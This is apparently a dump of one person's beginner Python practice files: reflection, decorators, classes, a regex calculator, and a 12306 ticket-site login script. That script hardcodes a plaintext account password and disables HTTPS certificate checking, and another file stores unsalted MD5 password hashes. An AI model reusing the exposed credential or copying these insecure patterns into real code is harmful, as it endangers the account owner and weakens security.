0.5535373091697693, "alphanum_fraction": 0.5831739902496338, "avg_line_length": 13.121622085571289, "blob_id": "991d722c6d4f8c0244c1cf9760e684ee41aa6495", "content_id": "ce65e0a80fb766283dedf42e88d9c34902ff3f69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 46, "num_lines": 74, "path": "/python学习/面向对象学习/反射.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\n\nclass Foo:\n stat = '123'\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def show(self):\n return \"%s-%s\" % (self.name, self.age)\n\n\nobj = Foo('alex', 19)\n\n# getattr 获取类对象成员的属性\nb = \"name\"\n# print(obj.__dict__[b])\n\n# 去什么东西里面获取什么属性\n# print(getattr(obj, \"name\"))\n# print(getattr(obj, b))\n\n# 获取类里的方法\n# func = getattr(obj, \"show\")\n# r = func()\n# print(r)\n\n# getattr(obj, \"name\") 获取对象属性\n# hasattr(obj, 'name') 判断对象属性是否存在\n# setattr(obj, 'k1', 'v1') 设置对象属性\n# delattr(obj, 'name') 删除对象属性\n# 通过字符串形式 操作对象中的成员\n\n\n# r = getattr(Foo, 'stat')\n# print(r)\n\n'''\nimport s2\n\n\nr1 = getattr(s2, 'Name')\nprint(r1)\n\nr2 = getattr(s2, 'func')\nprint(r2)\nv = r2()\nprint(v)\n\ncls = getattr(s2, 'Foo')\nprint(cls)\nprint(obj)\nobj = cls()\nprint(obj.name)\n'''\n\n\n# 例子\nimport s2\ninp = input('请输入要查看的Url:')\n\nif hasattr(s2, inp):\n func = getattr(s2, inp)\n result = func()\n print(result)\nelse:\n print('404')\n\n" }, { "alpha_fraction": 0.61387038230896, "alphanum_fraction": 0.6547546982765198, "avg_line_length": 22.920289993286133, "blob_id": "7d75453e75a7b65de0163c21ae3e7cb990d957df", "content_id": "a1ddc20ead6506558e5dce813d68704415c570d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4026, "license_type": "no_license", "max_line_length": 143, "num_lines": 138, "path": "/12306/fuck12306_login.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\nimport urllib2\nimport 
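# --- Illustrative sketch (not part of the repo above): the 反射.py file just
# shown routes requests through hasattr/getattr by string name. A minimal,
# self-contained Python 3 version of that dispatch pattern; the Router class
# and dispatch helper are invented names for illustration only.
class Router:
    def index(self):
        return "home page"

    def news(self):
        return "news page"


def dispatch(obj, action):
    # hasattr guards against a missing handler; getattr fetches it by name
    if hasattr(obj, action):
        return getattr(obj, action)()
    return "404"


print(dispatch(Router(), "index"))    # home page
print(dispatch(Router(), "missing"))  # 404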
urllib\nimport ssl\nimport cookielib\nimport json\nimport sys\nfrom fuck12306_check_seat import check_seat\n\n\n# 1 访问前需要login\n# 2 请求前要其他操作\n# 3 关联session : 是否是相同的ip 操作 cookie 验证\n# 12306 登陆过程\n# 1. 请求登陆页面\n# 2. 获取验证码\n# 3. 请求验证码url做验证\n# 4. 验证正确,请求登陆页面\n# 5. 验证用户名密码,登陆\n# 4 处理验证码\n# 5 查询车票\n# 6 预定车票\n# 1 查询到车票后,验证用户,需要用到cookie或者session https://kyfw.12306.cn/otn/login/checkUser\n# 2 根据返回参数,为ture 预定车票:https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest\n\n### cookie 生成\n# c = cookielib.LWPCookieJar()\n# cookie = urllib2.HTTPCookieProcessor()\n# opener = urllib2.build_opener(cookie)\n\n### cookie 保存到文件\ncookiefile = 'cookie.txt'\nc = cookielib.MozillaCookieJar(cookiefile)\ncookie = urllib2.HTTPCookieProcessor(c)\nopener = urllib2.build_opener(cookie)\n\n# 忽略证书认证\nssl._create_default_https_context = ssl._create_unverified_context\n\n## 请求验证码,保存图片\n# login 地址 带验证码的\ncodeimg_url = 'https://kyfw.12306.cn/otn/login/init'\n#验证码图片地址\ncode_img = 'https://kyfw.12306.cn/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand&0.06510420729186484'\n#校验验证码的地址\ncodeimg_request_url = 'https://kyfw.12306.cn/passport/captcha/captcha-check'\n# 真正的登陆地址\nlogin_url = 'https://kyfw.12306.cn/passport/web/login'\n\n\ndef add_header(req, url):\n # 对请求 添加 header\n req.add_header('User-Agent',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36')\n req.add_header('Referer', url)\n\n\ndef receive_img():\n # 把 验证码 保存到当前目录 code.png\n req = urllib2.Request(code_img)\n add_header(req, codeimg_url)\n\n # 保存验证码图片\n codeimg = opener.open(req).read()\n with open('code.png', 'wb') as fn:\n fn.write(codeimg)\n\n\ndef input_codeimg():\n # 手动输入验证码坐标 如:248,105\n code = raw_input('[248,105,109,52,259,53]>>>>>>')\n # 验证验证码\n req = urllib2.Request(codeimg_request_url)\n data = {\n 'answer': code, # 验证码\n 'login_site': 'E',\n 'rand': 'sjrand'\n }\n # 把字典类型转换成查询字符串,post的字符串[a=1&b=2]\n data = urllib.urlencode(data)\n print \"请求验证码的url的参数:\", data\n add_header(req, codeimg_url)\n\n #需要带上cookie\n html = opener.open(req, data=data).read()\n # c.save(ignore_discard=True, ignore_expires=True)\n print \"验证码验证后返回参数:\", html\n return html\n\n\ndef login():\n req = urllib2.Request(login_url)\n add_header(req, codeimg_url)\n data = {\n 'username': '[email protected]',\n 'password': '434wode434',\n 'appid': 'otn'\n }\n data = urllib.urlencode(data) # 把字典类型转换成查询字符串,post的字符串[a=1&b=2]\n print \"请求登陆url的参数:\", data\n\n html = opener.open(req, data=data).read()\n c.save(ignore_discard=True, ignore_expires=True)\n print \"登陆请求验证返回参数:\", html\n return html\n\n\n\n\nprint cookie,c\nprint opener\nreceive_img()\n# print(html)\n# #判断验证码是否验证成功\nresult = json.loads(input_codeimg())\nif result['result_code'] == '4':\n print('验证码校验成功')\nelse:\n print('验证码校验失败')\n sys.exit()\n\n\n# print(html)\n# 判断验证码成功后,判断登陆是否成功\nresult = json.loads(login())\nif result['result_code'] == 0:\n print('登录成功')\n c.save(ignore_discard=True, ignore_expires=True)\n print(\"查询是否有票\")\n check_seat()\n print(\"有票,买票,点选验证码\")\n print(\"没票,继续刷新\")\nelse:\n print('登录失败')\n sys.exit()\n\n" }, { "alpha_fraction": 0.4478986859321594, "alphanum_fraction": 0.46171560883522034, "avg_line_length": 16.3700008392334, "blob_id": "cd6a490aab1d0879bc00df2c8e657c57ba8407e5", "content_id": "11c80c0c690f23e7ab96e6ce00ce0496897ad7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1809, "license_type": "no_license", "max_line_length": 70, "num_lines": 100, 
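# --- Illustrative sketch: fuck12306_login.py above is Python 2
# (urllib2/cookielib). A hedged Python 3 equivalent of its cookie-persisting
# opener setup using http.cookiejar; the URL here is a placeholder, not a
# real 12306 endpoint.
import http.cookiejar
import urllib.request

jar = http.cookiejar.MozillaCookieJar("cookie.txt")
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
opener.addheaders = [("User-Agent", "Mozilla/5.0")]

resp = opener.open("https://example.com/")           # placeholder URL
jar.save(ignore_discard=True, ignore_expires=True)   # persist like cookie.txt
print(resp.status)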
"path": "/python学习/函数/装饰器练习.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jia wen long\n\n\n# 闭包\n# def outer(x=\"哈哈哈哈\"):\n# print(\"do something\")\n# c = 10\n#\n# def inner():\n# print(x, c)\n# # return x\n#\n# return inner\n#\n#\n# func = outer()\n# func()\n\n\n# 装饰器\nimport time\n\n\ndef showtime(func):\n def jtime():\n start_time = time.time()\n func()\n stop_time = time.time()\n print(\"%s Spend %s\" % (func.__name__, stop_time - start_time))\n return jtime\n\n\n@showtime\ndef home():\n print(\"This is home Page\")\n time.sleep(2)\n\n\ndef phone():\n print(\"This is phone Page\")\n time.sleep(2)\n\n\n@showtime\ndef jr():\n print(\"This is jr Page\")\n time.sleep(2)\n\n\nhome()\nprint()\nphone()\nprint()\njr()\n\n\n# login_status = \"False\"\n# username = \"jiawenlong\"\n# password = \"123456\"\n#\n# def check_login():\n# print(\"out\" % login_status)\n# def login():\n# global login_status\n# print(login_status)\n# if login_status != \"True\":\n# print(login_status)\n# login_status = \"True\"\n#\n# # user = raw_input(\"请输入用户名: \")\n# # passwd = raw_input(\"请输入密码: \")\n# # if user == username and passwd == password:\n# # page()\n# # login_status = \"True\"\n# # else:\n# # print(\"用户名密码错误!!\")\n# # else:\n# # page()\n# return login\n#\n#\n# f=check_login()\n# print(f())\n\n\n# def foo(*args, **kwargs):\n# print 'args = ', args\n# print 'kwargs = ', kwargs\n# print '---------------------------------------'\n#\n#\n# if __name__ == '__main__':\n# foo(1, 2, 3, 4)\n# foo(a=1, b=2, c=3)\n# foo(1, 2, 3, 4, a=1, b=2, c=3)\n# foo('a', 1, None, a=1, b='2', c=3)\n\n# 装饰器练习\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 18, "blob_id": "f2df55dfe690ebbc8cd3f4a1b4ee3c5f9d7b31ee", "content_id": "ac5415160f42da93c743f2763de501b769e2f6dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/未定义项目练习/笨方法.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-07-04\n\n__author__ = '@jiawenlong'\n\n" }, { "alpha_fraction": 0.5471394062042236, "alphanum_fraction": 0.5624496340751648, "avg_line_length": 13.264368057250977, "blob_id": "796a2e4328ff7b3bf43ff9662ada50e3de3ecf8f", "content_id": "2d86467d7fe7fc9e58933751c071bb45b9fa27b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1501, "license_type": "no_license", "max_line_length": 44, "num_lines": 87, "path": "/python学习/面向对象学习/class_字段方法属性.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-20\n\n__author__ = '@jiawenlong'\n\n\nclass province:\n # 静态字段\n country = '中国'\n\n def __init__(self, name):\n # 普通字段\n self.name = name\n self.L = ['jiawenlong']\n\n # 普通方法\n def bar(self):\n print('Bar')\n\n # 静态方法\n @staticmethod\n def sta(name, age):\n print(name, age)\n\n # 类方法\n @classmethod\n def classmd(cls):\n # cls 类名\n print('classmd')\n\n # 属性\n @property # 用于执行 obj.per\n def per(self):\n return self.L\n\n @per.setter\n def per(self, val):\n self.L.append(val)\n print(self.L)\n\n @per.deleter\n def per(self):\n del self.L[1]\n print(self.L)\n\n\n\"\"\"\n# 静态字段使用\nprint(province.country)\n\nhn = 
province('河南')\nprint(hn.name)\n\nhn.name = \"河南男\"\nprint(hn.name)\n\nhb = province('河北')\nhb.country = '美国'\nprint(hb.country, hb.name)\n\n# 普通方法调用\nobj = province('hh')\nobj.bar()\nobj.sta(1, 2)\nobj.classmd()\n#\n# 静态方法调用 节省内存\nprovince.sta(1, 2)\n\n# 类方法调用 节省内存\nprovince.classmd()\n\"\"\"\n\n# 应用场景\n# 1 如果对象中需要保存一些值,执行某功能时,需要使用对象中的值 --- 使用普通方法\n# 2 不需要任何对象中的值 --- 使用静态方法\n\n# 属性调用\nobj = province('aaa')\n# obj.per # print(\"Per\")\nret = obj.per\nprint(ret)\nobj.per = 111\n\ndel obj.per\n" }, { "alpha_fraction": 0.4534865617752075, "alphanum_fraction": 0.49774810671806335, "avg_line_length": 28.2681827545166, "blob_id": "7e61d53f2d27f506b672ca413308b0d94909f6d9", "content_id": "c7cc4a390d57613a93a2711c52c235774255ebde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6547, "license_type": "no_license", "max_line_length": 98, "num_lines": 220, "path": "/python学习/python作业/re正则作业计算器.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/11/14 22:11\n\n__author__ = 'JiaWenLong'\n\nimport re\n\n\n# 运算符 未完成\n# print(re.search('-?\\d+\\.?\\d{0,}(?P<operator>[+_*/])-?\\d+\\.?\\d{0,}', inter_js).group('operator'))\n# print(isinstance(-40, int))\n# print(isinstance(5.0, float))\n\n\n# 定义相关函数\ndef is_float(n):\n try:\n return float(re.search('-?\\d+\\.\\d+', n).group())\n except AttributeError:\n return False\n\n\ndef is_int(n):\n try:\n if is_float(n):\n return is_float(n)\n else:\n return int(re.search('-?\\d+', n).group())\n except AttributeError:\n return False\n\n\ndef muti_div(s):\n operation = re.compile('(?P<front>\\d+\\.?\\d*)(?P<operators>[*/])(?P<behind>-?\\d+\\.?\\d*)')\n res = s\n i = 0\n while i < len(re.findall('[*/]', s)):\n # print('muti_div ', res)\n opt = operation.search(res).group('operators')\n a = is_int(operation.search(res).group('front'))\n b = is_int(operation.search(res).group('behind'))\n expre_ssion = operation.search(res).group()\n\n # print('mut_div_Front_Behind_():', a, b)\n if opt == '*':\n result = a * b\n res = res.replace(expre_ssion, str(result))\n # print('*', res)\n # return muti_result\n else:\n # if isinstance(a, float) or isinstance(b, float):\n result = a / b\n res = res.replace(expre_ssion, str(result))\n # print('/', res)\n # return div_result\n # else:\n # result = a // b\n # res = res.replace(expre_ssion, str(result))\n # # print('//', res)\n # # return div_result\n i += 1\n # print('final', res)\n # print('='*50)\n return res\n\n\ndef add_minus(s):\n operation = re.compile('(?P<front>-?\\d+\\.?\\d*)(?P<operators>[+-])(?P<behind>\\d+\\.?\\d*)')\n s = format_strings(s)\n res = s\n # print('add_minux: ', res)\n\n try:\n operation.search(res).group('operators')\n except :\n return res\n\n i = 0\n if re.search('\\(-', s) or re.search('^-', s):\n j = len(re.findall('[+-]', s)) - 1\n else:\n j = len(re.findall('[+-]', s))\n\n while i < j:\n opt = operation.search(res).group('operators')\n a = is_int(operation.search(res).group('front'))\n b = is_int(operation.search(res).group('behind'))\n expre_ssion = operation.search(res).group()\n\n # print('add_minus_Front_Behind_():', a, b, s)\n if opt == '+':\n result = a + b\n res = res.replace(expre_ssion, str(result))\n else:\n result = a - b\n res = res.replace(expre_ssion, str(result))\n\n i += 1\n # print(res)\n return res\n\n\ndef format_strings(s):\n string = s.replace('++', '+')\n string = string.replace('+-', '-')\n string = string.replace('--', 
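# --- Illustrative sketch: the @property / setter / deleter trio demonstrated
# in class_字段方法属性.py above, condensed into a runnable example. The Box
# class is invented; its setter appends, mirroring the original per property.
class Box:
    def __init__(self):
        self._items = []

    @property
    def items(self):           # read:  box.items
        return list(self._items)

    @items.setter
    def items(self, value):    # write: box.items = x appends, as per does
        self._items.append(value)

    @items.deleter
    def items(self):           # del box.items clears the backing list
        self._items.clear()


box = Box()
box.items = 1
box.items = 2
print(box.items)  # [1, 2]
del box.items
print(box.items)  # []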
'+')\n string = string.replace('-+', '-')\n string = string.replace(' ', '')\n return string\n\ns1 = '1-2*((60-30+(9-2*5)*(9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2)*(-40/5+6))'\ns2 = '1 - 2 * ((60-30 + (-40/(-5)) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*-3)/(16-3*2))'\ns = '1 - 2 * ((60-30 + (40/-5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(4*(-3))/(16-3*2))'\n\nprint('eval:', eval(s))\nwhile re.search('\\(', s):\n\n # print('yuan: ', s)\n s = format_strings(s)\n brackets = re.compile('\\([^()]+\\)')\n expressions = brackets.findall(s)\n mv_brackets = re.compile('\\(([-+]?\\d+.?\\d*)\\)')\n\n # print('=' * 30)\n for expression in expressions:\n # print('E: ', expression)\n # expression = brackets.search(s).group()\n resault = muti_div(expression)\n finalyt = add_minus(resault)\n s = s.replace(expression, finalyt)\n # print('R', s)\n s = mv_brackets.sub(r'\\1', s)\n # print('mv_brackets: ', s)\n s = format_strings(s)\n # print('format: ', s)\nelse:\n resault = muti_div(s)\n # print(resault)\n finalyt = add_minus(resault)\n # print(finalyt)\n s = s.replace(s, finalyt)\nprint('Finally: ', s)\n\n# 关键在于 r\n# bold = re.compile(r'\\*{2}(.*?)\\*{2}')\n# text = 'Make this **cai**. This **junsheng**.'\n# print('Text:', text)\n# print('Bold:', bold.sub(r'<b>\\1</b>', text))\n\n# strings = s\n# while re.search('\\(', strings):\n# expression = brackets.search(s).group()\n# resault = muti_div(expression)\n# finalyt = add_minus(resault)\n# strings = strings.replace(expression, finalyt)\n# print('R', strings.replace(expression, finalyt))\n# # print('='*30)\n# else:\n# muti_div(strings)\n# add_minus(strings)\n\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# # 获取所有括号和内部的表达式\n# brackets = re.compile('\\([^()]+\\)')\n# inter_brackets = brackets.findall(s)\n# print('inter_brackets', inter_brackets)\n# # 运算符判断\n# ope = re.compile('\\d+\\.?\\d{0,}(?P<operators>[+\\-*/])\\d+\\.?\\d{0,}')\n# # operator = ope.search(inter_brackets[0]).group('operators')\n# # print(operator)\n# print('inter_brackets[0]', inter_brackets[0])\n#\n# # 浮点数 或者 整数 匹配\n# flaodORint = re.findall('-?\\d+\\.?\\d{0,}', inter_brackets[0])\n# print('flaodORint :', flaodORint)\n#\n# for i in range(0, len(flaodORint)):\n# NEXT = i+1\n# # print(NEXT)\n# if NEXT < len(flaodORint):\n# print(flaodORint[i], flaodORint[NEXT])\n# operator = ope.search(inter_brackets[0]).group('operators')\n# if operator == '+' or operator == '-':\n# value = add_minus('9-2*5')\n# if operator == '*' or operator == '/':\n# value = muti_div('9-2.7*5')\n#\n# print(value)\n# ret = muti_div('9-2.7*5')\n# print('ret', ret)\n# print(add_minus('9-2.8*5'))\n\n\n# #######################################################\n# s = '1 - 2 * ((60-30 + (5-40/5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2))'\n# s1 = '1 - 2 * ((60-30 + (-40/(-5)) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*(-3))/(16-3*2))'\n# s2 = '1 - 2 * ((60-30 + (40/-5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(4*(-3))/(16-3*2))'\n#\n# inter_kh = re.search('\\([^()]+\\)', s).group()\n# inter_js = re.sub('[()]', '', inter_kh)\n# print(inter_js, inter_kh)\n# ope = re.compile('\\d+\\.?\\d{0,}(?P<operators>[+\\-*/])\\d+\\.?\\d{0,}')\n# operator = ope.search(inter_js).group('operators')\n# print(operator)\n#\n# # 浮点数 或者整数匹配\n# l_n = re.findall('-?\\d+\\.?\\d{0,}', inter_js)\n# print('l_n :', l_n)\n#\n#\n\n#\n\n#\n#\n# # print(is_int(l_n[0]) / is_int(l_n[1]))\n# print(value)\n# print(re.sub('-8+5', str(value), s))\n" }, { "alpha_fraction": 0.47717392444610596, "alphanum_fraction": 0.498913049697876, 
"avg_line_length": 14.0819673538208, "blob_id": "2eabd145c9ca4bdc7b2750016832b7495ffc7f2e", "content_id": "046b9b930d2b7f8e5a861086b9c395200cb1ea6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1114, "license_type": "no_license", "max_line_length": 73, "num_lines": 61, "path": "/python学习/面向对象学习/class_封装.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-19\n\n__author__ = '@jiawenlong'\n\n'''\n面向对象,三大特性\n1. 封装\n2. 继承\n3. 多态\n'''\n\n\n# class one:\n# def echo(self, info):\n# print(\"%s, %s, %s, %s\" % (self.name, self.age, self.sex, info))\n#\n#\n# o = one()\n# o.name = '小明'\n# o.age = 19\n# o.sex = '男'\n# o.echo(\"上山去打柴\")\n# o.echo('最爱大保健')\n# o.echo('开车去东北')\n#\n# print()\n#\n# o.name = '老张'\n# o.age = 40\n# o.sex = '男'\n# o.echo(\"上山去打柴\")\n# o.echo('最爱大保健')\n# o.echo('开车去东北')\n\n# 构造方法\nclass one:\n def __init__(self, name, age, sex):\n \"\"\"\n 构造方法\n \"\"\"\n self.name = name\n self.age = age\n self.sex = sex\n\n def echo(self, info):\n print(\"%s, %s, %s, %s\" % (self.name, self.age, self.sex, info))\n\n\nxm = one(\"小明\", 19, '男')\nlz = one(\"老张\", 40, '女')\n\nxm.echo(\"上山去打柴\")\nxm.echo('最爱大保健')\nxm.echo('开车去东北')\nprint()\nlz.echo(\"上山去打柴\")\nlz.echo('最爱大保健')\nlz.echo('开车去东北')\n" }, { "alpha_fraction": 0.4888888895511627, "alphanum_fraction": 0.5365079641342163, "avg_line_length": 9.862069129943848, "blob_id": "a31054aecd71fc677c24e53c36ef460a7aa4fbdd", "content_id": "89edfe118368decdddc1b3a0ff94775776be6467", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 331, "license_type": "no_license", "max_line_length": 26, "num_lines": 29, "path": "/python学习/面向对象学习/s2.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\nName = 'jiawenlong'\n\n\ndef func():\n return 'func'\n\n\nclass Foo:\n def __init__(self):\n self.name = '123'\n\n\ndef f1():\n return '首页'\n\n\ndef f2():\n return '新闻'\n\n\ndef f3():\n return '精华'\n" }, { "alpha_fraction": 0.508474588394165, "alphanum_fraction": 0.6101694703102112, "avg_line_length": 18.83333396911621, "blob_id": "fc3b92cb40dc597b2dee7b20f0da6b7f2d21fd5a", "content_id": "31a9ac2ffa642db6f417ad4f8729e856b1f748f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 122, "license_type": "no_license", "max_line_length": 25, "num_lines": 6, "path": "/python学习/模块/__init__.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/8/10 11:11\n\n__author__ = 'JiaWenLong'" }, { "alpha_fraction": 0.5468424558639526, "alphanum_fraction": 0.5752949118614197, "avg_line_length": 19.884057998657227, "blob_id": "36c9882b0ac37f07c01a945ac0a0d9b05822bd1c", "content_id": "baf33b10201a28c69fec41f05a46d710139de1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 82, "num_lines": 69, "path": "/python学习/模块/明文加密模块hashlib.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-07\n\n__author__ = '@jiawenlong'\n\nimport hashlib\n\ndb = {\n 
'username': '2c9d18ba9ed23b6da92e6ec471d1805b', # jiawenlong\n 'pass': 'e10adc3949ba59abbe56e057f20f883e' # 123456\n}\n\n\n# h = hashlib.md5()\n# h.update('jiawenlong')\n# h.update('123456')\n# print \"mima:\", h.hexdigest()\n\n# h.update('123456'.encode('utf8')) ### python3 中必须对字符串进行转换\n# python3 字符串是以unicode方式存在内存的,需要encode转换为字节类型\n\n\ndef get_md5(s):\n hashs = hashlib.md5()\n hashs.update(s.encode('utf8'))\n return hashs.hexdigest()\n\n\n# def login(user, password):\n#\n# '''以下这种加密方式是在用户名的基础上,又对密码进行加密'''\n#\n# print \"密码:\", password\n# hash = hashlib.md5()\n# hash.update(user)\n# user = hash.hexdigest()\n# print\n# hash.update(password)\n# password = hash.hexdigest()\n# print \"密码:\", password\n# if user == db['username']:\n# if password == db['pass']:\n# print \"登陆成功\"\n# else:\n# print \"用户名或密码错误\"\n# else:\n# print \"用户名或密码错误\"\n\n\ndef login(username, password):\n \"\"\"函数调用加密,是分别加密,和上面的方式得到的密码是不同的\"\"\"\n user = get_md5(username)\n print()\n password = get_md5(password)\n if user == db['username']:\n if password == db['pass']:\n print(\"登陆成功\")\n else:\n print(\"用户名或密码错误\")\n else:\n print(\"用户名或密码错误\")\n\n\nuser = input(\"请输入用户名:_> \")\npaword = input(\"请输入密码:_> \")\n\nlogin(user, paword)\n" }, { "alpha_fraction": 0.5023607015609741, "alphanum_fraction": 0.5288007259368896, "avg_line_length": 16.649999618530273, "blob_id": "5341fdabc7751f0f9066d88497be585ccd9b5157", "content_id": "9c7415b55b8ff4a63cfda70f36273d20259490f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 53, "num_lines": 60, "path": "/python学习/面向对象学习/class_metaclass_类祖宗.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-28\n\n__author__ = '@jiawenlong'\n\n'''python 一切皆对象'''\n\n# class Foo:\n# def function(self):\n# print(123)\n\n\n\"\"\"以上和下面的写法是相同的,都是声明了一个类\"\"\"\n\n\n#\n# def function(self):\n# print(123)\n#\n#\n# Foo = type('Foo', (object,), {'func': function})\n\n\nclass Mytype(type):\n def __init__(self, *args, **kwargs):\n print(\"遇到 class Foo 执行这个Mytype_init:%s\" % 1)\n\n def __call__(self, *args, **kwargs):\n print(\"遇到 Foo() 执行 这个 Mytype_call: %s\" % 2)\n\n n = self.__new__(self)\n print(\"然后创建对象,调用Foo的__new__创建对象:%s \" % n)\n self.__init__(n)\n\n\n# 下面2行是2.7的写法\n# class Foo(object):\n# __metaclass__ = Mytype\n\nclass Foo(object, metaclass=Mytype):\n def __init__(self):\n print(\"最后执行,Foo_init: %s \" % 4)\n\n def __call__(self, *args, **kwargs):\n print(111)\n\n def function(self):\n print(567)\n\n # obj 是在new中创建\n def __new__(cls, *args, **kwargs):\n return 3\n # return \"对象\" [obj]\n\n\nobj = Foo()\n# obj.function()\n# obj()\n" }, { "alpha_fraction": 0.469613254070282, "alphanum_fraction": 0.6132596731185913, "avg_line_length": 15.477272987365723, "blob_id": "2183597d15fa432cdb5a6f667ba55e410b6ab8df", "content_id": "30ebd5c4292771218a580c4c8cc4f2c1b08dd3be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 102, "num_lines": 44, "path": "/python学习/面向对象学习/class_作业/bin/teacher.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-08\n\n__author__ = '@jiawenlong'\n\n\n# import json\n# import os\n# import sys\n# sys.path.append('..')\n# # Conf_path = sys.path\n# from lianxi 
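# --- Illustrative sketch: 明文加密模块hashlib.py above stores unsalted MD5
# digests, which precomputed tables break easily. The same get_md5 helper next
# to a salted SHA-256 variant; the salt string is a placeholder, not anything
# from the repo.
import hashlib


def get_md5(s):
    h = hashlib.md5()
    h.update(s.encode("utf8"))  # Python 3 hashing needs bytes
    return h.hexdigest()


def get_salted_sha256(s, salt="demo-salt"):  # salt value is illustrative
    return hashlib.sha256((salt + s).encode("utf8")).hexdigest()


print(get_md5("123456"))  # e10adc3949ba59abbe56e057f20f883e, as in the db dict
print(get_salted_sha256("123456"))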
import *\n\n\n\ndef digitalSum(n):\n if n == 0:\n return n\n return digitalSum(n//10) + n%10\n\n# print(digitalSum(19))\n\ndef digitalRoot(n):\n return digitalSum(digitalSum(digitalSum(digitalSum(n))))\n\n\n# print(digitalRoot(99909876541234556789098734567896543678909999999912345678901999123456789099999999))\n\n\ndef hailstone(n):\n if n % 2 == 0:\n print(n)\n hailstone(n//2)\n if n == 1:\n print(n)\n exit()\n else:\n print(n)\n hailstone(3*n+1)\n\n\nhailstone(15)" }, { "alpha_fraction": 0.5089163184165955, "alphanum_fraction": 0.5190672278404236, "avg_line_length": 30.973684310913086, "blob_id": "f620da0c8dac0a3dbb479fb42e7d03f829a2b79e", "content_id": "1a33bca70f4f1234b3c47f492755c471332a8980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3715, "license_type": "no_license", "max_line_length": 102, "num_lines": 114, "path": "/未定义项目练习/all-report.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\nimport xlrd\nimport datetime as dt\nimport os\nimport glob\nimport markdown\n\n# def create_md():\n# DT = dt.date.today().strftime('%Y-%m-%d')\n# file_name = \"/Users/admin/Documents/work/日报-周报/运维日报(\" + DT + \"-贾文龙).xlsx\"\n# md_file = \"/Users/admin/Documents/work/shells/rb.md\"\n#\n# rb = open(md_file, 'w')\n# book = xlrd.open_workbook(file_name)\n# sh = book.sheet_by_index(0)\n#\n# for hang in range(0, sh.nrows):\n# if hang == 0 or hang == 1:\n# continue\n# for lie in range(0, sh.ncols):\n# if sh.cell_value(rowx=hang, colx=lie):\n# value = sh.cell_value(hang, lie)\n# if lie == 5:\n# rb.write(\"|\" + '\\n')\n# if hang == 2 and lie == 5: rb.write(\"|--|--|--|--|--|\" + '\\n')\n# else:\n# rb.write(\"|\")\n# 